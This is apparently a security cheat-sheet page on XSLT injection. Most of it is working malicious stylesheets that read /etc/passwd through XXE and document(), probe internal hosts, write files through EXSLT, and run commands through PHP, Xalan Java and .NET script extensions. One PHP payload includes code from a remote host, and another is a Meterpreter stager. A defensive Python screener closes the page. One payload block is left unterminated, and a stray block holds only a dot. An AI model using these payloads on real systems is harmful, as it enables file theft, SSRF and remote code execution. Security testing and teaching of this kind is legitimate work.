# XSLT Injection
> Processing an unvalidated XSL stylesheet lets an attacker change the structure and contents of the resulting document, read arbitrary files from the file system (and reach internal network services), write files, or execute arbitrary code, depending on the XSLT processor in use and the extensions it exposes.
## Summary
- [XSLT Injection](#xslt-injection)
- [Summary](#summary)
- [Tools](#tools)
- [Exploit](#exploit)
- [Determine the vendor and version](#determine-the-vendor-and-version)
- [External Entity](#external-entity)
- [Read files and SSRF using document](#read-files-and-ssrf-using-document)
- [Write files with EXSLT extension](#write-files-with-exslt-extension)
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
- [References](#references)
## Tools
## Exploit
### Determine the vendor and version
The XPath `system-property()` function reports which XSLT processor is running, and the processor decides which of the techniques below apply. Typical values of `xsl:vendor` are `libxslt` (PHP, `xsltproc`, Python's lxml), `Saxonica` or `Apache Software Foundation (Xalan XSLTC)` (Java, which opens the door to Java extension functions) and `Microsoft` (.NET, where `msxsl:script` is the route to code execution).
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <xsl:value-of select="system-property('xsl:vendor')"/>
</xsl:template>
</xsl:stylesheet>
```
The same function also returns the supported XSLT version and the vendor URL:
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  Version: <xsl:value-of select="system-property('xsl:version')"/><br/>
  Vendor: <xsl:value-of select="system-property('xsl:vendor')"/><br/>
  Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')"/><br/>
</xsl:template>
</xsl:stylesheet>
```
### External Entity
A stylesheet is itself an XML document, so if the parser that loads it resolves external entities, a DTD declared in the stylesheet gives a classic XXE file read. The entity is expanded into the output wherever `&ext_file;` appears.
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample [<!ENTITY ext_file SYSTEM "/etc/passwd">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <xsl:for-each select="fruits/fruit">
    Fruits &ext_file;: <xsl:value-of select="name"/> - <xsl:value-of select="description"/>
  </xsl:for-each>
</xsl:template>
</xsl:stylesheet>
```
### Read files and SSRF using document
The standard XSLT 1.0 `document()` function loads an external resource by URI and returns its content as a node set. Pointing it at a local path reads a file (the file must be well-formed XML for most processors, although error messages often leak the first lines of non-XML files); pointing it at an `http://` URL turns the processor into an SSRF proxy.
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
  <xsl:for-each select="fruits/fruit">
    Fruits: <xsl:value-of select="document('/etc/passwd')"/> - <xsl:value-of select="description"/>
  </xsl:for-each>
</xsl:template>
</xsl:stylesheet>
```
For SSRF, replace the path with a URL, for example `document('http://internal-host/')`; the response is embedded in the output if it is well-formed XML, and the request is still sent even when it is not.
### Write files with EXSLT extension
EXSLT is a community-maintained set of extensions to XSLT 1.0, implemented by libxslt, Xalan and others. The `exsl:document` extension element writes part of the transformation output to a file of the attacker's choosing, so a processor that has the extension enabled and runs with write permissions on the file system lets the attacker create files on the server (this is the primitive behind the PT SWARM "file creation" note in the References).
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
<xsl:template match="/">
  <exsl:document href="/tmp/xslt_test.txt" method="text">
    Hello World!
  </exsl:document>
</xsl:template>
</xsl:stylesheet>
```
`method="text"` writes the content verbatim, so the same payload writes a PHP or JSP file into a web root when the path is writable. libxslt consults its security preferences before writing: PHP's `XSLTProcessor` blocks file writes by default unless `setSecurityPrefs()` has been relaxed, whereas `xsltproc` allows them.
### Remote Code Execution with PHP wrapper
These payloads rely on libxslt's PHP bridge: `php:function()` is only available when the application has called `XSLTProcessor::registerPHPFunctions()`, and when that method is called without an argument list every PHP function becomes callable from the stylesheet. The technique is the one described in the agarri.fr post listed under References.

Execute the function `readfile`.
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
  <xsl:value-of select="php:function('readfile','/etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
```
Execute the function `scandir`.
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
  <xsl:value-of select="php:function('scandir','.')"/>
</xsl:template>
</xsl:stylesheet>
```
Execute a remote PHP file using `assert`. The PHP code is placed in a variable so that the quotes do not have to be escaped inside the XPath expression. This only works on PHP 7 and earlier: `assert()` stopped evaluating string arguments in PHP 8.0.
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
  <xsl:variable name="payload">include("http://10.10.10.10/test.php")</xsl:variable>
  <xsl:value-of select="php:function('assert',$payload)"/>
</xsl:template>
</xsl:stylesheet>
```
Execute a PHP meterpreter using the PHP wrapper (same `assert` trick, with the stager delivered inline as base64).
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
  <xsl:variable name="payload">eval(base64_decode('Base64-encoded Meterpreter code'))</xsl:variable>
  <xsl:value-of select="php:function('assert',$payload)"/>
</xsl:template>
### Remote Code Execution with Java
Xalan (and the XSLTC copy bundled in the JDK) lets a stylesheet call arbitrary Java methods through extension namespaces of the form `http://xml.apache.org/xalan/java/<class>`. The payload below resolves `java.lang.Runtime`, calls `exec()`, and prints the `toString()` of the resulting `Process` (the command's output itself is not returned; redirect it to a file or use a reverse shell to see it). Setting `XMLConstants.FEATURE_SECURE_PROCESSING` on the `TransformerFactory` disables these extension functions, and Saxon-HE does not support reflexive Java extension functions at all (Saxon-PE/EE do).
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
  <xsl:variable name="rtobject" select="rt:getRuntime()"/>
  <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
  <xsl:variable name="processString" select="ob:toString($process)"/>
  <xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>
```
```xml
.
```
### Remote Code Execution with Native .NET
The .NET processors accept embedded C# (or VB/JScript) through the `msxsl:script` extension element; the script defines functions in the `implements-prefix` namespace that the template can then call from XPath. This works unconditionally with the legacy `XslTransform` class; `XslCompiledTransform` compiles the script only when it is loaded with `XsltSettings.EnableScript = true` (or `XsltSettings.TrustedXslt`), so the default settings are not exploitable this way.
```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="urn:attacker">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string run(string cmd)
{
    System.Diagnostics.Process proc = new System.Diagnostics.Process();
    proc.StartInfo.FileName = "cmd.exe";
    proc.StartInfo.Arguments = "/c " + cmd;
    proc.StartInfo.UseShellExecute = false;
    proc.StartInfo.RedirectStandardOutput = true;
    proc.Start();
    string output = proc.StandardOutput.ReadToEnd();
    proc.WaitForExit();
    return output;
}
]]>
</msxsl:script>
<xsl:template match="/">
  --- BEGIN COMMAND OUTPUT ---
  <xsl:value-of select="user:run('dir')"/>
  --- END COMMAND OUTPUT ---
</xsl:template>
</xsl:stylesheet>
```
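Every technique on this page hinges on a handful of stylesheet features (a DTD, `document()`, the PHP, EXSLT and Xalan extension namespaces, remote `href`s). A server that must accept user-supplied stylesheets should reject those up front, before the processor sees them. The screening function below is an added example written for this page, not code from any project it describes; it uses only the Python standard library, and the sample stylesheets it is run against are constructed here to mirror the payloads above. The namespace list and the message strings are this example's own choices and should be extended for the processor actually deployed.

```python
"""Static pre-screen for user-supplied XSLT stylesheets (added example)."""
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"

# Extension namespaces behind the payloads on this page (example list, extend per engine).
DANGEROUS_NAMESPACES = {
    "http://php.net/xsl": "PHP bridge: php:function()",
    "http://exslt.org/common": "EXSLT common: exsl:document writes files",
    "http://xml.apache.org/xalan/java": "Xalan Java extensions",
    "http://xml.apache.org/xslt/java": "Xalan Java extensions (legacy URI)",
}
# Per-class namespaces such as http://xml.apache.org/xalan/java/java.lang.Runtime
# or Saxon-style java:java.lang.Runtime are matched by prefix.
DANGEROUS_NS_PREFIXES = ("http://xml.apache.org/xalan/java/", "java:")

NS_DECL = re.compile(r"xmlns:([A-Za-z_][\w.-]*)\s*=\s*[\"']([^\"']*)[\"']")
XPATH_CALL = re.compile(r"\b(document|unparsed-text|php:function)\s*\(")
DTD_MARKER = re.compile(r"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


def _namespace(tag):
    """ElementTree encodes the namespace as {uri}local; return uri or ''."""
    return tag[1:tag.index("}")] if tag.startswith("{") else ""


def screen_stylesheet(xml_text):
    """Return the list of reasons to reject the stylesheet; empty means clean."""
    findings = []
    if DTD_MARKER.search(xml_text):
        # Stop before parsing: a stylesheet never needs a DTD, and expat would
        # either expand the declared entities or fail on the reference.
        findings.append("DTD/ENTITY declaration: external entity file read")
        return findings

    # Namespace declarations are not visible as attributes after parsing, so
    # collect them from the raw text before handing it to ElementTree.
    for prefix, uri in NS_DECL.findall(xml_text):
        if uri in DANGEROUS_NAMESPACES or uri.startswith(DANGEROUS_NS_PREFIXES):
            findings.append(f"extension namespace xmlns:{prefix}={uri}")

    root = ET.fromstring(xml_text)
    for elem in root.iter():
        ns = _namespace(elem.tag)
        if ns in DANGEROUS_NAMESPACES or ns.startswith(DANGEROUS_NS_PREFIXES):
            findings.append(f"extension element {elem.tag}")
        # XPath lives in select/test; href carries xsl:include/import and exsl:document targets.
        for attr in ("select", "test", "href"):
            value = elem.get(attr)
            if value is None:
                continue
            match = XPATH_CALL.search(value)
            if match:
                findings.append(f"{match.group(1)}() in @{attr}: {value}")
            if attr == "href" and "://" in value:
                findings.append(f"remote href: {value}")
    return findings


# Constructed samples: one benign stylesheet and one per technique shown above.
BENIGN = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><ul><xsl:for-each select="fruits/fruit"><li><xsl:value-of select="name"/></li></xsl:for-each></ul></xsl:template>
</xsl:stylesheet>"""
XXE = """<!DOCTYPE x [<!ENTITY ext_file SYSTEM "/etc/passwd">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">&ext_file;</xsl:template></xsl:stylesheet>"""
FILE_READ = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><xsl:value-of select="document('/etc/passwd')"/></xsl:template></xsl:stylesheet>"""
PHP_RCE = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/"><xsl:value-of select="php:function('readfile','/etc/passwd')"/></xsl:template></xsl:stylesheet>"""
EXSLT_WRITE = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
<xsl:template match="/"><exsl:document href="evil.txt" method="text">Hello World!</exsl:document></xsl:template></xsl:stylesheet>"""
JAVA_RCE = """<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<xsl:template match="/"><xsl:value-of select="rt:exec(rt:getRuntime(),'ls')"/></xsl:template></xsl:stylesheet>"""

SAMPLES = {"benign": BENIGN, "xxe": XXE, "document": FILE_READ,
           "php": PHP_RCE, "exslt": EXSLT_WRITE, "java": JAVA_RCE}


def screen_all():
    """Screen every sample; maps sample name to its list of findings."""
    return {name: screen_stylesheet(src) for name, src in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in screen_all().items():
        print(f"{name:9s} -> {findings or 'ok'}")
```

The check is deliberately a denylist of the constructs this page demonstrates, which is enough to catch copy-paste payloads but not a substitute for hardening the processor itself (secure-processing mode, no registered PHP functions, default `XsltSettings`, restrictive libxslt security preferences). The `DOCTYPE` test runs on the raw text on purpose: parsing first would let the XML parser act on the entities before the screen could object.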
## References
* [From XSLT code execution to Meterpreter shells - @agarri - 2 July 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
* [XSLT Injection Basics - Saxon - Hunnic Cyber](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
* [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - 22 May 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
* [XSLT injection lead to file creation - PT SWARM - 30 May 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)